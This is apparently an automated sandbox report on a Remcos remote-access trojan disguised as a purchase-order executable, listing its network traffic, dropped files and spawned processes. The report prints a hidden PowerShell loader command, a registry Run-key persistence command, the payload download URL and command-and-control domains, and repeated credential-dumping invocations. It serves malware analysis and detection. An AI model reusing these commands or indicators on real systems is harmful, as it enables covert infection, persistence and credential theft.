HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 178.237.33.50 178.237.33.50
Source: Joe Sandbox View	IP Address: 193.222.96.21 193.222.96.21

Source: Joe Sandbox View

ASN Name: SWISSCOMSwisscomSwitzerlandLtdCH SWISSCOMSwisscomSwitzerlandLtdCH

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic

HTTP traffic detected: GET /XpMumnKrmZynRk242.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: enelltd.topCache-Control: no-cache

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /XpMumnKrmZynRk242.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: enelltd.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: enelltd.top
Source: global traffic	DNS traffic detected: DNS query: learfo55ozj02.duckdns.org
Source: global traffic	DNS traffic detected: DNS query: leirfo45ozj01.duckdns.org
Source: global traffic	DNS traffic detected: DNS query: geoplugin.net

Source: wab.exe, 00000009.00000003.3888277399.0000000009B5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp
Source: wab.exe, 00000009.00000002.4113065678.0000000009B48000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3951905036.0000000009B5D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3888277399.0000000009B5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp:
Source: wab.exe, 00000009.00000002.4113065678.0000000009B48000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3951905036.0000000009B5D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3888277399.0000000009B5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpD
Source: wab.exe, 00000009.00000002.4113065678.0000000009B48000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3951905036.0000000009B5D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3888277399.0000000009B5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpd
Source: wab.exe, 00000009.00000002.4113065678.0000000009B48000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3951905036.0000000009B5D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3888277399.0000000009B5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpg
Source: wab.exe, 00000009.00000002.4113065678.0000000009B48000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3951905036.0000000009B5D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3888277399.0000000009B5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpq
Source: PO-USC-22USC-KonchoCo.exe, 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO-USC-22USC-KonchoCo.exe, 00000000.00000000.1615338710.000000000040A000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000001.00000002.3485653451.00000000058ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.3483439341.00000000049D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.3483439341.0000000004881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.3483439341.00000000049D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3487057946.0000000006F3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.3483439341.0000000004881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000001.00000002.3485653451.00000000058ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.3485653451.00000000058ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.3485653451.00000000058ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: wab.exe, 00000009.00000002.4123998720.0000000025110000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000009.00000002.4113065678.0000000009B14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://enelltd.top/XpMumnKrmZynRk242.bin
Source: wab.exe, 00000009.00000002.4113065678.0000000009B14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://enelltd.top/XpMumnKrmZynRk242.bino
Source: powershell.exe, 00000001.00000002.3483439341.00000000049D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.3485653451.00000000058ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown

HTTPS traffic detected: 104.21.45.139:443 -> 192.168.2.4:49739 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe

Jump to behavior

Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe

Code function: 0_2_00405846 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405846

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 00000009.00000003.3951905036.0000000009B5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4113065678.0000000009B48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.3888277399.0000000009B5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wab.exe PID: 7188, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\fvberms.dat, type: DROPPED

Source: wab.exe

Process created: 66

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Schokker\Alkoholeksperter\styrtning\Tedeummernes\PO-USC-22USC-KonchoCo.exe

Jump to dropped file

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 9_2_082CAD3D Sleep,NtProtectVirtualMemory,

9_2_082CAD3D

Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe

Code function: 0_2_00403645 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_00403645

Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe

File created: C:\Windows\resources\0809

Jump to behavior

Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe	Code function: 0_2_00406DA0	0_2_00406DA0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_0435F000	1_2_0435F000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_0435F8D0	1_2_0435F8D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_0435ECB8	1_2_0435ECB8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_0704BB00	1_2_0704BB00

Source: PO-USC-22USC-KonchoCo.exe

Static PE information: invalid certificate

Source: PO-USC-22USC-KonchoCo.exe, 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmp

Binary or memory string: OriginalFilenameacrodontism.exeV vs PO-USC-22USC-KonchoCo.exe

Source: PO-USC-22USC-KonchoCo.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Insecta" /t REG_EXPAND_SZ /d "%Fumigatorium% -windowstyle minimized $Hysterogenic=(Get-ItemProperty -Path 'HKCU:\Stafetlbenes\').Indsbedes;%Fumigatorium% ($Hysterogenic)"

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1127/14@8/3

Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe

0_2_00403645

Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe

Code function: 0_2_00404AF2 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_00404AF2

Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe

Code function: 0_2_004021AF CoCreateInstance,

0_2_004021AF

Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe

File created: C:\Users\user\AppData\Roaming\brosy

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1800:120:WilError_03
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Mutant created: \Sessions\1\BaseNamedObjects\jmofvnb-6GMGJI

Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe

File created: C:\Users\user\AppData\Local\Temp\nss8C28.tmp

Jump to behavior

Source: PO-USC-22USC-KonchoCo.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process

Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: PO-USC-22USC-KonchoCo.exe	ReversingLabs: Detection: 15%
Source: PO-USC-22USC-KonchoCo.exe	Virustotal: Detection: 11%

Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe

File read: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe "C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe"
Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Moralioralist=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Amphioxidae.Zin';$Relaying=$Moralioralist.SubString(7931,3);.$Relaying($Moralioralist)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Insecta" /t REG_EXPAND_SZ /d "%Fumigatorium% -windowstyle minimized $Hysterogenic=(Get-ItemProperty -Path 'HKCU:\Stafetlbenes\').Indsbedes;%Fumigatorium% ($Hysterogenic)"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Insecta" /t REG_EXPAND_SZ /d "%Fumigatorium% -windowstyle minimized $Hysterogenic=(Get-ItemProperty -Path 'HKCU:\Stafetlbenes\').Indsbedes;%Fumigatorium% ($Hysterogenic)"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Moralioralist=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Amphioxidae.Zin';$Relaying=$Moralioralist.SubString(7931,3);.$Relaying($Moralioralist)"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Insecta" /t REG_EXPAND_SZ /d "%Fumigatorium% -windowstyle minimized $Hysterogenic=(Get-ItemProperty -Path 'HKCU:\Stafetlbenes\').Indsbedes;%Fumigatorium% ($Hysterogenic)"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
